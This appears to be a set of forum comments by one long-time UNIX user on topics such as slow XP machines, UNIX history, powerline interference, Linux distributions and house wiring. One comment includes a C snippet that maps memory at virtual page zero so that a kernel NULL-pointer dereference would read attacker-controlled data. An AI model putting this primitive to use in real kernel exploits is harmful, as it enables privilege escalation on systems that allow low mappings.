I'm similarly concerned about *one* of my XP systems. It's a 2.4GHz Celeron D (I think). When delivered, it had 256MB of memory and ran passably fast (it was bought for utility, not speed), but when my wife recently said that she could not use it any more because it was slow, I had a look.
In 256MB, it was paging heavily. The hard disk light was almost permanently on. Virus, I thought, but no. New scans by recently downloaded copies of both virus and adware scanners showed nothing. The firewall (Smoothwall) showed no unexplained network activity (but did show how much happens when installed apps check for new versions!). It booted into a live Linux distro just fine, showing the basic hardware was sound. Disabling all the bloated startup background processes made little difference, nor did de-fragging the hard disk.
Doubled the memory, and the machine became usable again. Looked more closely at the memory usage and the installed and running tasks, and saw that there are a whole load of Microsoft patches that are memory resident, occupying resources (I'm not kidding, I counted nearly 100MB worth of patches), taking the basic memory footprint of the idle machine to about 260MB.
So: do Microsoft install patches as memory-resident diverts, as opposed to building them into a new kernel?
As an exercise, I installed another system from scratch using XP install media, and found that I could get a newly installed, unpatched XP system running quite happily in 128MB (obviously not using any heavyweight apps, and behind a firewall!). As I installed SP2, it needed 256MB, and when I put in the required virus scanner, 256MB was no longer sufficient for acceptable performance. I did not put SP3 on, although maybe I should.
So, it is quite possible that your slow machine is not slow because of XP, but because there are loads of start-at-boot processes and MS patches using all of the available memory. If there is a modern antivirus system installed (you know, the type that intercepts and inspects [and slows down] all reads and writes to both disk and network), then it is also possible that this is what is crippling a perfectly capable machine. Decide whether it is worth re-installing. Or possibly, investigate Edubuntu, whereby you can dispense with the AV stuff. But this is more than most Windows people are comfortable doing.
So, in reference to my earlier post, the default behaviour for a machine like this will be to chuck the machine and buy a new one. What I don't understand is why do you need half-a-gig of memory just to run an idle machine? Madness.
Windows 7 compatible hardware?
I think the comments here are missing an important aspect of the problem.
I appreciate that new hardware has always run new operating systems better, but some of the systems people are complaining about aren't really old.
People (and computer companies) seem to imagine that anybody who has a system older than 2-3 years should really replace their hardware. Think what this would mean if the same were true for cars, your heating system, your cooker, or your television (scratch the television; the manufacturers are already managing to convince people that their 2 year old 1080i LCD televisions are not 'true HD').
What is missing is the ongoing support for the 2-5 year old Athlon XP, Pentium D, M and 4 machines that are still perfectly capable of the web browsing, email, word processing and home accounts that many people use them for. These are still usable machines, and the only thing that will make people dump them (literally) is either a hardware failure, withdrawal of support (as MS are threatening to do for XP) leading to their online banking complaining that their system is insecure, or a sales person persuading them that what they have is lacking in some way.
If MS wish to make XP an OS of the past, they must have an affordable upgrade path to W7, IE8, WMP 10 etc., and make sure that drivers are available for older hardware (and the same must be forced on the display and audio device manufacturers who are so keen on abandoning their old-hardware customer base). After all, I'm sure that a 3GHz Pentium 4 must be at least as fast as a 1.5GHz single-core Atom 270, which is supposed to be able to run Windows 7 without problems.
Of course, there is a vested interest in the computer manufacturers shifting new hardware, and support issues for older stuff are a useful lever for them. I've long thought that MS and the hardware manufacturers are in collusion to make sure that they continue to sell the new 'shiny' things.
Computers should be commodity tools now, not subject to the whims and fads of fashion. It sickens me to see, week after week, serviceable computers and televisions being sent to the recyclers, not because they no longer work, but because the owners have been conned into thinking that the old ones are too old/slow/difficult to secure or support, and the answer is to replace them. I'm not a Green, but the blatant waste is bordering on the criminal.
A computer should be for (its) life, not just for Christmas (sic).
Only just got used to CSM!
It is a mistake to assume that xCat is built from the ground up. It still uses underlying components that are currently used by CSM, including NIM (NIMoL for Linux) for system image deployment and RSCT for monitoring, and they all revolve around other well-known systems such as NFS, Kerberos, and rsh/ssh (to say nothing of the open source components).
It's true that the overall gloss on the top is new, but many of the bits under the covers are the same. It's interesting to also see that IBM Director still uses NIM for Power/AIX systems.
I must admit that I believe that the switch from PSSP to CSM was a bit of a dog's dinner (I understand the architectural reasons for the change: PSSP was designed around the constraints of the AIX SP/2, which were too rigid for the Cluster/1600 offering). It took a couple of years for CSM to even approach the usability that PSSP had, and I fear the same will be true for the switch from CSM to xCat2.
The real problem is that the people who write the code often do not work in the real world, and end up making assumptions about the shape of the systems. This means that, once you take into account the various networking, commercial support and security constraints placed on real-world systems by people like Government Agencies and the Financial organisations (the people most likely to deploy large-scale commercial clusters), very often the management tools, as delivered out of the box, are about as useful as a perforated condom.
Even in HPC environments, it is comparatively unusual to have the systems configured exactly as the vendors suggest. I'm currently working with a large Power6 HPC cluster, and the requirements for outward event reporting to an enterprise reporting system that is NOT Tivoli are causing more than a few problems, along with security, access and data control that IBM had no real incentive to architect solutions for. As a result, it is necessary to dig under the glossy covers of the management and deployment tools using whatever can be found to implement what is needed.
All I can hope is that, since xCat2 has come out of Alphaworks, real system admins have had input to the requirements and may have spotted any potential problems, but I wonder how many 200-node Power clusters have been deployed anywhere.
I'm still not very happy about having to learn another clustering tool, though, and I've still got IBM Director to contend with in the future for non-HPC clusters.
As I remember it, it was the JFS code that IBM wrote for AIX 3.1 that was the main issue. SCO were arguing that this was a derived work from the AT&T source, although it was more like an evolution of the BSD4.4 filesystem, complete with distributed inodes and a block bitmap for the free space. The whole concept of derivative works currently appears to be sparking controversy with GPL2, which just shows how convoluted US Copyright law is. See http://www.theregister.co.uk/2009/10/15/black_duck_gpl_web_conference_copenhaver_radcliffe/
All the LVM and hooks to extend filesystems were, as far as I am aware, IBM innovations that were actually new code unique to AIX.
Subsequently, IBM contributed the original LVM and JFS code to the Open Software Foundation, where it came to be used by several different vendors who implemented OSF/1 (although I don't believe that DEC used it in their implementation; they preferred their own Advanced File System [not to be confused with the Andrew File System]). This did not cause a problem, because all OSF members were already UNIX source licensees.
It is obviously now available for Linux, which caused the whole furore.
If anybody sees my copy of the Lions annotated V6 UNIX code, I would be grateful to hear, as it appears to have fallen out of my coat pocket whilst in the cloakroom.
@AC - Enjoyed Xenix?
Not sure I understand Microsoft's mismanagement. While they were responsible for the port/rewrite of UNIX that produced Xenix, at no time have they had any control of UNIX. They bailed out of the UNIX market when the original SCO was spun off to a separate company, and the rest is a history of competition.
It is ironic to recall that at one time early in their history, Microsoft did actually see themselves as a UNIX vendor, making statements to the effect that their future was DOS desktop systems clustered around UNIX servers. They were an AT&T source code licensee.
I recollect that at the time, Xenix/286 was regarded as a poor UNIX port, as it did not adhere to man Section 2 system call semantics. I believe that this was only pulled together when (the original) SCO joined AT&T, Sun and other notable UNIX vendors in the SVR4 converged UNIX venture, although I am prepared to be corrected on this.
BTW. As it is a trademark, UNIX should always be capitalised.
Anyway, I will be glad when the FUD that SCO have been peddling finally goes away.
As I understand it, because the devices are not intended to transmit on radio frequencies, they avoid a number of the standards that apply to wireless transmitters.
The standards they fall foul of are the electrical and electromagnetic interference standards, and it does look like some devices are seriously dirty in this respect. And it looks like the frequencies that RSGB are trying to protect are not actually frequencies used by the devices, but unintended harmonics of the carrier frequencies. This should be fixable in the design without making the devices unusable.
I believe that OFCOM (if they are the people who police electromagnetic interference) should crack down on the manufacturers of devices that do not meet the required standards. I wish someone would produce a list of the devices that are dirty, though. I am using some Netgear homeplug devices (which work very well), but I don't know whether they are causing a problem.
Come on - Thunderbirds
Alan uses a video watch in the episode "Move - And You're Dead" (1965)
Brains uses a video watch in the episode "Day of Disaster" (1965)
and I'm sure one actually features in the movie "Thunderbirds Are Go" (1966). I remember seeing a picture of the oversized model wrist with, I believe, an early colour TV or possibly a projector behind it. Good effects for the time, all done with models, camera tricks and pyrotechnics (not for the watch, of course, unless you include "30 Minutes After Noon").
That's mine with a copy of "The Complete Gerry Anderson" in the left pocket, and the copy of "Century 21" in the right.
Medium or large businesses do it differently from home users. Very few business-related PCs will be put on a desk running the same cut of the OS as the manufacturer installed.
Almost anybody with an IT department will have an image that they will put on any new PC that they take delivery of. This installs known versions of all of the standard software. It is quite normal for their 'fix' for software-borked PCs to be to re-install the initial image. It's quick and low overhead, and can be done by your average IT trainee.
Many businesses will also create updated images for their existing PCs to 'bring them up to date'.
While I doubt that many will deploy a new OS (like Windows 7) on older kit (mainly because of the licensing costs), it is refreshing to know that it probably would work on any relatively modern PC. Of course, many businesses could extend the lifetime of their ageing kit and maximise ROI by either making the machines thin clients, or putting a fee-free OS on them for the sector of their business that can work with Firefox, Java applications and Open Office.
... gopher and archie, as well as uunet, usenet and many other net-news and email services as early users of Internet connectivity. These all pre-dated NCSA Mosaic. Ahhh. Plain text protocols. How trusting we were.
Nooo, I didn't have a coat, or wait, maybe I did... I get so forgetful now.
This is the reason why the current BT master phone sockets include a "service jack". Under the front plate is an internal phone plug attached to the plate, and a socket attached to the base. All extension wiring is attached to the front plate. By removing the front plate from the master socket, you are removing all extension cabling and other devices in the house, and leaving the circuit with a single phone outlet that BT can be reasonably certain is not compromised by customer-supplied wiring (it's actually against your contract to mess with the wires on the BT side of the master socket).
It's not difficult, and is perfectly safe provided that nobody has wired mains into your house telephone wiring. Ring signal voltage is only about 50V at limited current, so even in extreme cases it should not cause people with heart conditions a problem.
I think that it is also in your contract with BT that they may ask you to do this.
I know many people regard PCs as appliances, but in reality they are not, and there should be no 230V mains outside of the power supply, so there are no real safety concerns about taking the side panel off a computer. Of course, some manufacturers actually dissuade you from taking the covers off by putting tamper stickers on the case (personal experience with the now defunct Time, Fujitsu-Siemens and even an eMachine [bought from MorganComputers, not PC World, I hasten to add]). This causes different concerns about allowing people to upgrade their systems.
Users unwilling to learn
It's switched off on my wife's computer. She is an unwilling novice, and a bit of a luddite as well. She does not remember what I tell her about computers from one day to the next, mainly because she just doesn't care.
All I hear from her is "I've put my CD in the drive, and it's not working" when she puts one of her craft CDs in the system.
God knows how many times I've told her, but the instructions on the CD cover tell her that it will autorun, and she trusts that more than she trusts me. It's driving me crazy.
This type of software is written for people who will never care about how computers work, and uses every trick in the book (and some daft ones as well) to try to make sure that the computer is just an appliance. I can't even install the software on the hard disk, because the STUPID and SIMPLISTIC copy protection system KNOWS that it will ALWAYS run from drive D, and has hard-coded paths scattered throughout the software. Of course, nobody partitions their hard disks, do they!
I admit that I use HomePlug standard devices in my house, because the wiring is already present, and being an older house with thick walls, built over three storeys, I have significant WiFi dead spots even with wireless range extenders (repeaters). Likewise, running Cat 5/5e/6 around the house to all of the kids' bedrooms would be an expensive option, even if I were to use PDS-like infrastructure, and I would not want to have powered switches on every floor of the house, for economy reasons.
I am worried about what this article is saying, because I try to be a good neighbour, but had not considered that I would be polluting the EM spectrum to the degree implied. I trusted that the manufacturers would abide by the standards, that the standards were reasonable, and that OFCOM would police them.
If two of these three trusts cannot be relied on, then I am worried that I might be impacting my neighbours, at least one of whom has a large pole antenna, presumably for ham or shortwave radio. Should I be going around all of my neighbours asking whether I should stop using Powerline Ethernet, or should I sit back and wait to see whether I get a knock on the door about these devices?
I would hate to have to dump the devices, because they are just too useful.
P.S. All of my devices are Netgear 14 or 85Mb/s devices, not BT supplied devices.
Anybody got a reference to the patent that has been infringed? I've backtracked all of the related Reg. articles, and I cannot find out the patent number. It would help us understand whether MythTV or any of the other TV recorder programs are likely to disappear.
You've obviously never worked anywhere Sarbanes-Oxley or Basel II requirements have been applied (like *ANY* Western financial organisation). If you follow these as specified, you have to implement a segregation of authority, meaning that your system administrators cannot subvert the security logs (at least, not without leaving a secure-from-them audit trail). There should be a different part of the organisation who have no ability to change the systems, but who do have authority over the logs, whose job it is to make sure that the sysadmins do not step over the mark.
The problem in a nutshell is that, yes, the sysadmins can do pretty much anything within their control, but this should be subject to audit. Allowing sysadmins to peek at other users' passwords enables them to do things as other users while bypassing any audit trail that points back to *THEM*, and leaving a false trail pointing at someone else.
Key loggers and password leaking backdoors should not be able to be installed without again leaving some evidence of the fact.
As SarBox is mandatory for US financial organisations, does this mean that it should be recommended that SQL Server should now be added to the banned software list, or at least relegated to non-customer and non-financial database use?
This behaviour from a major IT provider is just inexcusable.
Virgin getting better
I was at the point of leaving Virgin because of their FUP bandwidth limits which they hit me with every two weeks or so (there are 5 family members in the house, using a total of 1GB+ per day - no it's not P2P, just OS fixes, internet voice chat, gaming, iPlayer, SkyAnytime PC, iTunes, Amazon MP3 store, YouTube etc.)
But they've not complained or limited me in the last three months, and the performance has improved at peak times (I can actually use iPlayer in the evening!)
I guess they must either have lost some other customers, or increased their local bandwidth. As a result, I'm currently quite happy.
I don't use their support unless I really have to, however, as it appears I know more about their network than the people in their call centres.
I don't understand the fuss
I know genetic UNIX well. I do not know the Linux kernel as well, but I do know this.
Userland processes run in a virtual address space controlled by the kernel that does not match physical memory addresses.
The memory mapping registers that control a process's virtual address space can only be manipulated with the processor supervisor bit set (this should only be set when running kernel code after a system call, or in a kernel thread), so a process cannot map new bits of physical memory into its address space without the kernel's involvement. This is a FUNDAMENTAL security requirement that is well understood by kernel writers (and incidentally, a reason why the first versions of Windows on Intel processors prior to the 80286/80386 were fundamentally insecure).
Page zero of a userland process does not necessarily map to physical page zero. It's dependent on the hardware architecture of the system, the way that the process's virtual address space is set up by the kernel, and whether you have a separate set of supervisor-mode memory mapping registers.
All UNIX variants I have used that do map page zero into a userland process's virtual address space ALWAYS write-protect this page, and most hide it so it can't even be read. It is normal to only map page zero if the system call interface does not provide a mechanism to change the memory mapping registers during the transition to system mode (IBM's original RS/6000 processors could not do this. The result was that the first piece of kernel code had to execute in the non-privileged process's address space before it had the chance to change the memory mapping registers, so some kernel code had to appear in the process's address space).
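As I understand it, the one kernel-mediated route by which an ordinary process can get a mapping at virtual page zero is mmap() with MAP_FIXED. A minimal sketch (my assumption: a kernel that still permits low mappings, i.e. vm.mmap_min_addr set to 0; hardened systems refuse this):

```c
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

int main(void)
{
    /* Ask the kernel for a writable page at virtual address 0. On a
     * hardened system (vm.mmap_min_addr > 0) this fails with EPERM. */
    void *p = mmap((void *)0, 4096, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (p == MAP_FAILED) {
        perror("mmap page zero");
        return 1;
    }
    /* If this succeeds, a subsequent kernel NULL-pointer dereference
     * would read attacker-controlled data from this page. */
    memset(p, 0x90, 4096);
    printf("mapped page zero at %p\n", p);
    return 0;
}
```

Note that this only maps *virtual* page zero of the process; it says nothing about physical page zero, hence my question below.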
So. My question is how do you write to physical page zero to exploit this problem without already having escalated privileges? Maybe someone with some real Linux kernel experience can explain.
I'm off to /usr/src on my laptop to have a dig. If I find anything relevant, I'll post again.
Re: Exploding Phones
It is axiomatic that if you want a high capacity battery, then it holds a lot of energy when charged. It is also a fact that high capacity==highly reactive chemicals in the battery (after all, it is a chemical reaction that produces the energy).
This means that pretty much all devices with batteries are potentially dangerous (if you don't believe me, try shorting a couple of good alkaline AA cells connected in series, and see how long you can hold them!). And you will get even more spectacular results with NiCads. It all depends on the internal resistance of the battery: the lower the resistance, the faster the battery can be made to liberate its total capacity, and as we know from school physics, V=I*R but P=I*I*R, so the lower the resistance, the higher the generated current and thus the higher the rate of release. Power means heat, and heat means liberated gas, which can cause explosions, and burns.
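To put illustrative numbers on that (the figures here are assumptions for the sake of the arithmetic, not from any datasheet): dead-short a single 3.7V Li-ion cell with an internal resistance of 50 milliohms and it dissipates

$$P_{\text{short}} = \frac{V^2}{r} = \frac{(3.7\,\text{V})^2}{0.05\,\Omega} \approx 270\,\text{W}$$

mostly inside the cell itself, which is why a shorted pack gets hot enough to vent.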
Bearing in mind how much energy is required to move a car, I would hate to see what would happen to a Lithium Polymer battery car in a fiery crash with a petrol vehicle. Nor would I want to be a fireman trying to tackle an electrical fire on the motorway.
I claim that this is either a Chemistry or Physics teacher, and this is a Pedantic Thermodynamic and/or Electrical Power Equation Nazi Alert!... Come on, it is Friday afternoon.
@AC re EMP
What's the flight-deck made of? Wood? (Sorry, those were the WW2 Yank carriers, weren't they?)
I think that the couple of inches of steel needed to support the weight of the planes would be at least as good as tinfoil at stopping the magnetic leakage from the linear motors.
@AC "Just too many"
I can certainly appreciate many of the things you have said, indeed when I was reading it I wondered whether I had written it in my sleep until I got to the point about OSX.
You are, however, taking the Luddite view that I strenuously try to avoid. Yes, UNIX has been a good operating system (and my bread-and-butter) for the whole quarter century plus of my working life, but that does not mean that it will remain a good operating system forever. Like it or not (and I don't), genetic UNIX is now a dead end. Novell, SCO or whoever owns the AT&T code base now have no interest in reviving UNIXWare, HP/UX and Tru64 are legacy (thanks HP!) and the future of OpenSolaris is questionable, with the sands rapidly running out on Solaris for SPARC. This leaves AIX as the last actively developed AT&T derived UNIX (I'm ignoring the smaller companies, most of which are gone or going anyway).
OpenBSD, by the very nature of the court battle between Berkeley and AT&T that made it AT&T code free, can only nominally be called a genetic UNIX (yes, I know about the V7 code base, I was around then), and I do not remember whether OpenBSD, FreeBSD, or NetBSD actually got SVID or XOpen accredited.
So what you now have is a diminishing number of marginally incompatible UNIX systems which adhere to a set-in-stone standard which is becoming increasingly unimportant, and Linux. If you look at where the technological change is coming from, it is certainly not from the UNIX community. Where have the latest X11 and graphics driver changes come from? How about the virtualisation technologies (and, yes, IBM use Linux as an enabler for their hypervisor)? Web browsing, multimedia, printer support, user interface: this work is all happening in Linux space and being backported on occasion to the UNIX base. This includes Perl, Python, Ruby, Apache and any number of other Open Source packages. And often it is very difficult to compile these on AIX, at least, because of the number of additional libraries needed. This is a much more difficult problem than it would be on *ANY* Linux distro.
The number of people I now work with in UNIX space who EXPECT the GNU variants of the command set by default is considerable. I keep having to bite my tongue to not remind them that GNU's Not UNIX, and they should not think that the two are the same.
I work mainly with AIX, and I am finding that the number of pure AIX people I deal with is minuscule. Everybody who has an interest in computers outside of work is at least dabbling in Linux, if only to give them another career strand if and when AIX falls out of favour with the banks and government agencies.
So by all means immerse yourself in OSX as the closest thing to a genetic UNIX available on the desktop, but please do not regard yourself as a typical UNIX person. You're not any more. (Do you really use TWM as your window manager? I'll admit it's fast, but the word basic does not even start to describe it! If you do, you would probably feel very happy with fvwm on most Linux distros).
BTW, I'm currently playing with V7/x86. Now that is a true genetic UNIX, although not much use for watching DVDs. In case you are interested, it's running inside VirtualBox on Ubuntu 8.04 LTS, which is very suitable as a low-maintenance Linux distribution.
My coat is the faded corduroy jacket with the leather elbow patches, and has the Lions annotated UNIX V6 source in the inside pocket. Careful, it's like me, old and a bit fragile.
Old, old, old.
ARP spoofing has been around as long as ARP and IP have been in use, i.e. a long time. Using it for VoIP and video-over-LAN is new, but merely a new application of an old technique.
Unfortunately, gratuitous ARP is too useful in device failover scenarios for it to be removed from the standard for all devices. The answer is to make sure that nobody has unauthorised access to the LAN, and of course when we say LAN here, we are talking about the routed segment that runs the same subnet as one of the end-point systems. This is why the technique is not applicable to the Internet as a whole.
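For anyone curious what a gratuitous ARP actually looks like on the wire, here is a rough sketch of the frame layout (the field values are the conventional ones; this is an illustration of the fields, not a packet generator):

```c
#include <stdint.h>

/* On-the-wire layout of an Ethernet II frame carrying a gratuitous
 * ARP announcement. For real use this would need to be packed and
 * pushed out of a raw socket. */
struct arp_announce {
    uint8_t  dst_mac[6];   /* ff:ff:ff:ff:ff:ff -- broadcast to the whole segment */
    uint8_t  src_mac[6];   /* MAC of the sender (the failover/spoofing host) */
    uint16_t ethertype;    /* 0x0806 = ARP */
    uint16_t htype;        /* 1 = Ethernet */
    uint16_t ptype;        /* 0x0800 = IPv4 */
    uint8_t  hlen, plen;   /* 6-byte hardware, 4-byte protocol addresses */
    uint16_t oper;         /* 1 = request (2 = reply is also seen in the wild) */
    uint8_t  sha[6];       /* sender MAC: the MAC claiming the address */
    uint8_t  spa[4];       /* sender IP -- "this IP lives here now" */
    uint8_t  tha[6];       /* ignored for gratuitous ARP */
    uint8_t  tpa[4];       /* target IP == sender IP: what makes it gratuitous */
};
```

Every host that refreshes its ARP cache from this frame will send traffic for that IP to the announcing MAC, which is exactly the behaviour both failover and spoofing rely on.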
@Linux is not held back
Like so many things in life, one size never fits all.
Linux is in an awkward place at the moment, being the only real alternative to Microsoft's domination from top to bottom of the computing world. It is the only single OS that goes from embedded devices, PDAs and phones, through desktop and server, all the way to mainframes and supercomputers (I know OSX fits in many of these categories, but I have yet to see a supercomputer running it!). And before anybody shouts that it is not a single OS, I would suggest that it is more a single OS than Windows Mobile, Embedded Windows, Server and 7 will ever be.
But because of this, it needs diversity. The requirements of low power for portable devices, prettiness for the desktop and maximum instructions per second for HPC do not fit together in a single distro.
So, for the masses using Intel and AMD PCs, Ubuntu is desperately needed (support, ease of install and use, good HW coverage). For smaller devices, Chrome and Android work. For servers, Red Hat Enterprise, Debian, CentOS and SuSE. For bleeding edge development, Fedora. For HPC, any of the many custom distros used by IBM or SGI or Cray or NEC. And if you have a preference for another distro not mentioned here, please use it, with my blessing.
Where's the problem? There is no 'tearing apart' of the Linux developer community to support these, and while the publicised events at CentOS ripple the water, they will never really damage the perception of the people who use CentOS. And even if they do, I'm sure that most places using it would prefer to switch to Red Hat Enterprise or a CentOS fork rather than Windows.
The only problem I can see is making sure that the people behind the distros remain committed and engaged. This is what has happened at CentOS, and even if another path had been followed (CentOS forking), I don't believe any users would have suffered.
Unfortunately, it is not possible for the community-supported model to offer all that established commercial OS providers can. We will see some distros fall out of favour (Slackware springs to mind). So we need players like Red Hat, Novell, IBM et al. as well, to generate revenue that pays for at least some of the people who contribute to the core development.
All that happens in forums like this is really noise, albeit interesting in parts.
In about 1984, I was shown a hardware speech recognition system attached to a BBC micro that could be trained for about 200 words reliably.
In 1990, I was shown a software system running on an Intel 386 system that would achieve about 80% accuracy when untrained, rising to over 90% when given some training.
In about 1999, I played around with Dragon Naturally Speaking and ViaVoice, both of which were able to do a competent job of turning speech into text, even if they only did basic syntactic analysis.
Each time, I was told that 'context sensitive, natural language recognition' was only a matter of 5 years away.
In the 25 years during which I have seen voice recognition working, commodity computing power has risen by something like 4 orders of magnitude, and DSP hardware that can do the majority of the work has become even faster, and significantly cheaper.
Why is it, then, that this technology supposedly cannot be made to work? And why do we not have home media centres, fridges and cookers that we can talk to? After all, an iPhone can listen to a song and name it with a high degree of accuracy. It's really just a matter of application.
I guess that it is just one of those unfulfilled technological dreams. Or possibly, the computer and device manufacturers don't want it, because it would start to make the GUI irrelevant, and slow down the pace they could re-sell us ever more pretty and more compute and graphics intensive operating systems and hardware.
God, I've been in this business too long.
@AC "They never stop..."
...and all Windows and Mac users are corporate sops, who slavishly buy anything from their favourite money-guzzling multinational as long as it's shiny, yes?
I don't think either stereotype really fits the majority of people.
I use Linux because it is UNIX-like, because of the intellectual freedom, and also because it's not encumbered by someone trying to extract as much money as possible from me as often as possible. This is not being a freetard, merely financial prudence. I paid for Linux distros in the past, before the Internet was fast. And I buy all my media; P2P is a last resort, used only when it is the *ONLY* way to get something (mainly deleted titles). And I waited a long time until Amazon got their MP3 store up and running (usable from Linux - hooray) before doing anything other than ripping CDs and LPs for music.
And I have credit cards. Mainly because (shock, horror) I have a family (a real one, with kids and all) and I need to even out money flow sometimes. Might consider swapping one to get one with TUX in my pocket. Might not though...
@AC on SPARC's death
SPARC always was a published architectural standard. That's what Sun wanted when it created the original SPARC (I still have the launch blurb in a box somewhere). It never really wanted to be in the chip foundry business, but to use partners to license, develop and produce the silicon. Never quite worked out as they intended, but I believe that this fundamental way of working still exists.
I expect SPARC to out-survive Sun by some considerable time, especially if Oracle decide to cut the SPARC standard free, which is what it deserves.
Open-source hardware. What an interesting idea...
That Transfer-Encoding error is caused by using Firefox through a Squid transparent proxy to view DS. It's been a problem for over a year. It was not clear whether it was a DS, Squid or Firefox problem last time I looked.
As a committed Linux user, I have not been able to use iTunes even when I had a functional iPod (it broke!).
I started using Amarok for maintaining my iPod, and then discovered that I could buy music from Amazon's MP3 store using Linux, and plug the music into Amarok. The selection is quite extensive too.
I am now using a no-name Chinese media player, and Amarok handles this as well (although I miss the music organizer that the iPod had). It can also handle TCMP on my Palm Treo.
So, it should be possible to buy and run a Pre without needing iTunes.
Apple do not yet ...
Viglen? A PC manufacturer?
If I remember correctly, they started by skinning TEAC bare 5.25 floppy drives in a plastic sleeve case, with appropriate wires and a 40/80 track switch, for BBC Micros. Not a PC product in sight then.
I've still got one somewhere, and it (and the BBC Micro) still worked last time I tried it (but the floppies themselves are pretty patchy). Think I paid £199 for it, plus the cost of the 8271 disk controller kit and DFS ROM. Seemed cheap at the time, and it probably was, bearing in mind how many people bought them!
If you look, there is a battered copy of the BBC Advanced User Guide in the inside pocket. Thanks.
Why in this day and age have we not also got low-voltage DC plumbed into houses? Put a 12V supply in, and you could almost certainly do away with the vast majority of the black bricks that litter our houses. It is much easier to go from 12V DC to 9V or 5V DC in a compact manner (look at car devices), and once it is in as a standard, especially if it is a plugless track system, then small devices will be made to work from 12V directly and not need a step-down. We then no longer need bulky 230V 13A plugs!
This would also allow us to move from inefficient transformer/rectifier devices (the majority of cheap power supplies) to a more efficient, larger, central switch-mode power supply, to keep all of the greens happy and reduce our power bills.
Only problem would be the high current demands of certain devices.
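The scale of that problem is easy to illustrate (the kettle is my own example, not anyone's proposal): a 2kW heating load on a 12V rail would draw

$$I = \frac{P}{V} = \frac{2000\,\text{W}}{12\,\text{V}} \approx 167\,\text{A}$$

which needs cable as thick as your thumb, so the 12V ring would only ever make sense for the low-power electronics.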
I said three carry the power, and a common neutral. 3+1=4. Yes? Please read the comment before posting.
Single phase. Yes, domestic properties just get a single phase. Commercial properties quite often get three phase, but this is used as three 230V feeds which go to different parts of the property, unless you have something like a mainframe or an IBM SP/2 (RIP). But even these (I believe) separate the circuits out to 3x230V into 40V(?) DC converters, and then distribute this around the frame.
When I was at college, we found that the two sides of our dining hall (where we had bands playing) were on different phases. Caused no end of earth-loop hum on the PA equipment we used until we worked out what was going on. And you could get quite a belt between the EARTHs of the two different sides, as they were earthed separately (we measured 120V AC between the earths).
When they say three wire single phase, I presume they mean 2+Earth. Normally, Earth is a local earth, with just 230V Live and Neutral on the cable from the electricity company.
If you have three phase, they also provide a neutral, thus requiring a four wire, three phase installation. Only specialist equipment runs 415V between phases, and this is not the norm for most sites, although I will probably get flamed for generalisation.
@Anon re: Earth and Neutral bonded together
Typically, AC is carried by the power company as three phases (i.e. three separate wires carrying AC power wrt ground, with a 120 degree phase difference between them) and a common neutral. The effect of this is that, when summed, the three phases should have a potential wrt ground of 0 volts, so the neutral wire should carry no current (it all cancels out), and it will somewhere in the power infrastructure be grounded (but not in your house!).
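The cancellation drops straight out of the trigonometry, assuming perfectly balanced loads on the three phases:

$$\sin(\omega t) + \sin\!\left(\omega t - \tfrac{2\pi}{3}\right) + \sin\!\left(\omega t + \tfrac{2\pi}{3}\right) = 0$$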
Unfortunately, the real world is not so simple. Most inductive loads (read: high-power devices) cause a phase shift to the AC waveform, so the combined neutral may carry residual AC voltage, especially in a single-phase installation. Also, when you are looking at power delivery to domestic houses, it is normal for each house to be on only a single phase, with the phases alternated down the street (so each of your neighbours may well be on a different phase from you). This means that if you grab neutral, you had better be prepared for a shock, although it is unlikely to be a full 230V and *may* be negligible. It really depends on the difference in power consumption between you and everyone else attached to your local substation, and how good your regional electricity distribution company is at balancing the load between the phases.
This alternation of phases also explains why it is possible for some types of power cut to only affect some of the houses in a street.
Inappropriate comments on Reg. forums?
Humour aside, can I claim the comments on the alternative meaning of Ubuntu as abuse? They are dis'ing my technical ability as a committed Ubuntu user.
I could do both Debian and Slackware, but basically I haven't the time. I use Ubuntu because it needs little time, not because I am technically naive (and also because it returns a superior user experience).
My coat is the one with the picture in the inside pocket of 30 years of Unix and Linux documentation on a shelf at home.
Please don't take Asus's implementation of Xandros as a typical Linux. It's not, and I have already said so. Try Ubuntu Jaunty Jackalope. I think you will see that it is a world apart from Xandros, and I believe easier to install (and use, IMHO) than Windows.
Your comment about a 'new user' has two possible meanings. A new to Linux but previous Windows user will see anything that is not Windows as different and possibly difficult. A new to computing user is unlikely to see any real difference in ease of use between recent Windows or Linux.
You just have preconceptions as a Windows user. I am a long-term Unix user (since before Windows, and in fact PC-DOS), and I find Windows infuriating. But I am not so blinded that I cannot see the merit in what Microsoft and their numerous partners have achieved in usability. But just because Windows is dominant in the non-server market does not make it automatically best.
Many of the core 'features' of Windows (such as drag-and-drop) were actually developed by others, and some appeared on Unix and other OSes before Windows (look at Looking Glass on Unix). You might be surprised at what the Torch Triple-X could do back in 1985, and of course Sun, and Apollo, in the workstation market.
I appreciate you making the effort with Xandros. Unfortunately, it was almost certainly the wrong Linux distribution for what you wanted (as would be any of the niche distributions, or in fact the Linux in a Tivo or any embedded system). You might draw an analogy between EeePC Xandros and Windows Mobile Edition. I don't think you would enjoy getting that to run Firefox 3 either.
I'm not arguing any different about Xandros, but if vendors shipped with Ubuntu, you would have had a different experience.
The space issue, which is a feature of the way UnionFS was used, is one of the primary problems for the EeePC. It's good for a device that will rarely change, but not for a dynamic OS. This is one reason why Asus's implementation of Xandros was just no good for those in the know, but very good for those who use the device as an appliance.
I think that your comment that 'no one really wants a frozen, nonupdatable snapshot of a system' is not actually true. I know a large number of people who, once a system is as they want it, will never touch the configuration again. It's just that they are not in the technical community. Many people want to use a computer as a tool, not as an end in itself. My father is still using IE 5.5 on Windows 95 OSR2, and he has no desire to update it. It does what he wants, and I'm sure that he is not atypical of a large part of the potential netbook market. (Please note I am not suggesting Win95 on today's netbooks, just illustrating a point!)
If you doubt this, just look at the stats. on the number of un-patched Windows systems out there, and patches are easy to apply.
But this market is not even getting the opportunity to buy into netbooks, because Microsoft's behaviour, and negative comments, are frightening people away from Linux.
I just wish that a netbook supplier would ship a good, major Linux distribution. Then we would see whether MS have really managed to capture this market. This has to be done before the Windows 7 tax appears, as afterwards will be too late.
I, too, dumped Xandros on my EeePC 701, but this was because I wanted a full Linux, and although you could enable kickstart and a KDE desktop, it was sufficiently different (did anybody else try to work out how it started with you logged in?).
I suspect that people who actually used the 701 as it was intended (the easy desktop) would be happy, but this was not me. Unfortunately, it was mostly people like me who saw the benefit.
